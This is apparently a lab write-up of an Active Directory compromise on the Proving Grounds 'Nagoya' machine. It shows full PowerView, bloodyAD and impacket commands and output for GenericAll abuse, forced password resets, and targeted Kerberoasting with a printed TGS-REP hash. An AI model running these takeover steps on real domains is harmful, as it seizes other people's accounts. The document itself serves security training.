InfoSec LAB

Nagoya_GenericAll

Created: 4 min read

GenericAll

During the BloodHound enumeration, all 3 compromised accounts, being part of the employees group, has the GenericAll access to 4 users in the helpdesk group. The helpdesk group has then the GenericAll access to the christopher.lewis user, who has a transitive membership to the Remote Management Users group, allowing direct access to the nagoya.nagoya-industries.com host via WinRM.

svc_helpdesk

The svc_helpdesk account is the preferred target as it is a service account with a SPN. The account is also kerberoast-able and was successful kerberoasted although the TGS-REP hash couldn’t be cracked

While there are a lot of ways to compromise the target user from this point as the GenericAll privilege grants a complete control over the user object, password reset can be made to take over the target user object

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache powerview 'NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com' --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity svc_helpdesk -ResolveGUIDs -Where "SecurityIdentifier contains employees"'
Logging directory is set to /home/kali/.powerview/logs/nagoya-industries-nagoya.nagoya-industries.com
[2025-04-23 19:55:34] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN                    : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID                   : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : User
InheritanceType             : None
SecurityIdentifier          : NAGOYA-INDUSTRIES\employees
 
ObjectDN                    : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID                   : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : User
SecurityIdentifier          : NAGOYA-INDUSTRIES\employees
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache bloodyAD -d NAGOYA-INDUSTRIES.COM -k --host nagoya.nagoya-industries.com get writable
 
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nagoya-industries,DC=com
permission: WRITE
 
distinguishedName: CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=Andrea Hayes,OU=employees,DC=nagoya-industries,DC=com
permission: WRITE
 
distinguishedName: OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD
 
distinguishedName: CN=Iain White,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=Joanna Wood,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=Bethan Webster,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

This can be confirmed using PowerView and bloodyAD.

Password Reset (svc_helpdesk)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache bloodyAD -d NAGOYA-INDUSTRIES.COM -k --host nagoya.nagoya-industries.com set password svc_helpdesk Qwer1234
[+] Password changed successfully!

Password reset has been conducted for the svc_helpdesk account; Qwer1234

Validation (svc_helpdesk)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/svc_helpdesk@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in svc_helpdesk@nagoya.nagoya-industries.com.ccache

Validated TGT generated for the svc_helpdesk account

christopher.lewis

As detailed above, the christopher.lewis user is the preferred target due to his transitive membership to the Remote Maanagement Users group

While there are a lot of ways to compromise the target user from this point as the GenericAll privilege grants a complete control over the user object, password reset can be made to take over the target user object

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache powerview NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity christopher.lewis -ResolveGUIDs -Where "SecurityIdentifier contains helpdesk"'    
Logging directory is set to /home/kali/.powerview/logs/nagoya-industries-nagoya.nagoya-industries.com
[2025-04-23 20:02:32] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN                    : CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com
ObjectSID                   : S-1-5-21-1969309164-1513403977-1686805993-1132
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : User
InheritanceType             : None
SecurityIdentifier          : NAGOYA-INDUSTRIES\helpdesk
 
ObjectDN                    : CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com
ObjectSID                   : S-1-5-21-1969309164-1513403977-1686805993-1132
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : User
SecurityIdentifier          : NAGOYA-INDUSTRIES\helpdesk
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache bloodyAD -d NAGOYA-INDUSTRIES.COM -k --host nagoya.nagoya-industries.com get writable
 
[...REDACTED...]
 
distinguishedName: CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

Confirmed

Targeted Kerberoasting

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache impacket-targetedKerberoast -d NAGOYA-INDUSTRIES.COM --no-pass -k --dc-host nagoya.nagoya-industries.com --dc-ip $IP --request-user christopher.lewis            
[*] Starting kerberoast attacks
[*] Attacking user (christopher.lewis)
[+] Printing hash for (Christopher.Lewis)
$krb5tgs$23$*Christopher.Lewis$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/Christopher.Lewis*$c46c8e24b2918320e08776e01c2e69fc$a5604be25318906ea24a540134f31ad587f31bf4e679986f3d27fe10da559ee23404baa706b7b13c65874473df470539f0dbfed30101c1279e99fdccdd848790effc18e84f29a72a59dd55dab7d5763069c628fa81578b3a0899b490d8e6468330c2ba6989e27d5ab4b4c6e871d16b9c5e0f16ec5f492edac5b89566673dda8fb6f378b7aa3cb3790b9142582774409f0215e0caf0333547eee4dcf38530249c89bc31c0dbf0c31549ea5c63b8d4dcc753110c2da7bbe52c2df304913cba28a7121da50dc847c64fa9adb17076afc655dc4a96b749171be78e86c4f1c8f1616312dcd7ce78729c25038ea511692d059ba0d52580590168f219c3ede22ab8258667a11df78e59dfec276bf6d88aa005b8e8a4549dc063257b2a9bd48ceab029c8c57d90fca4a8ed52e169a07a33eaf96a5ac9885065522c746c7eda048ede9380e1c732a649ec24b1ed643a3d9a0e68c4078187f15939cabe8a571200c6faf74716879774753bc472149cf3faf46732e64ec7eab2b2a34a02fee8d80d1c2eb4b5cf5d279127b8b05ddf5e53c6573e8c905a09fb86763e9d62e0530d5b479a06708db3033e741552b426cc54188cf32222612492241ecc8e97b3e25500527b8b3f4c0d8466a0edd446732b73a446824b7b699ee7316d8653f56736e71848b9f1aaf4b5ef68be41c1a983bd62699d8191616dc64a1f7ce8458ac189766382e4b55665d132f21b73d2e6282def9cb16a55a181591e02c223c9d4dcfa5185d1ff78479502c03354a3d17de5436df1124a095d73d37b541dc6e3c26feb995ece035c8c88dd8c2892ca76dd8d72c5954412b1aebe52fcdfd839819175f87df7e58e54ee53b986d6684662eafd0f6d3b575d6b127a023f26ab3764ad93dd9ebecae2cc10aaa4671336cb67f7cb941b3596cefd2ab0dccaae60caee46caba62001b70c209649c9961919f586fa16e27ea093a01d4e26a61778a824a6c54870d94240334cb4eb672165c6a60fa4d1626c8d3dc0347c28dadbb6b000121e09446002d25f4921c95c94743a03cce0997999c923cfab60d7c9a421db37468c11c60e22108f5da255fbe4fca380b35624df559fe7fd30e82e05f75ab07bd7f8389ca2cc4ae4ac24f4dfe5fdbfb54f6ed0c0a1f6d9de9269d096eb55e6d2b7db912c0387f4136a99cf89e9d30f21e22b379140b9c68daf4df2e9bfabc19d629fb2116d3eabf13149b0592fda88533c4e6d47af00a45b31203dbcb1bddcedda404f7cb7e5c9607ee28a7f4add02f42949b99047e1415d83ff69dcc1688504f06f446a13cf590842825a2e953a11848f919a761f9c3b012f5b31dea07f3fabed4c6c0e5bb50d5a01de684a0d508626945627d4cdfebcf63645bd4f3a4d7739a09efe0ccef399f382f644fd054b26bdb2308f36f2d9240f5a350e6b556fb5ee50d51beab23c21d2024a44aca3d429fac45de8c81457e9a561d74e7f26039db714e9c10a941eb3df99109c66242b08493d44ccc69599551319df44da452f5f57c93384226eceb394624da78c1f9f5b18c3087e68c2d98081404ac71ad1ef7ef310d79ea1664f09e656bcbe99d217a1a9375e0892c92e22b926e8b536698d00eec78f0ff452a7948f92e694a833a77ef0d3514ff

I wanted to reserve the user’s original password, so I opted out to the targeted Kerberoasting Targeted Kerberoasting successful, however, the TGS-REP hash is uncrackable

Password Reset (christopher.lewis)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache powerview NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Set-DomainUserPassword -Identity christopher.lewis -AccountPassword Qwer1234'
Logging directory is set to /home/kali/.powerview/logs/nagoya-industries-nagoya.nagoya-industries.com
[2025-04-23 20:22:35] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-04-23 20:22:35] [Set-DomainUserPassword] Principal CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com found in domain
[2025-04-23 20:22:35] [Set-DomainUserPassword] Password has been successfully changed for user Christopher.Lewis
[2025-04-23 20:22:35] Password changed for christopher.lewis

Password reset successful for the christopher.lewis user

Validation (christopher.lewis)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/christopher.lewis@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in christopher.lewis@nagoya.nagoya-industries.com.ccache

Validated TGT generated for the christopher.lewis user Given that the user is part of the Remote Management Users group, I can WinRM directly to the DC host

Interactive Graph View

Backlinks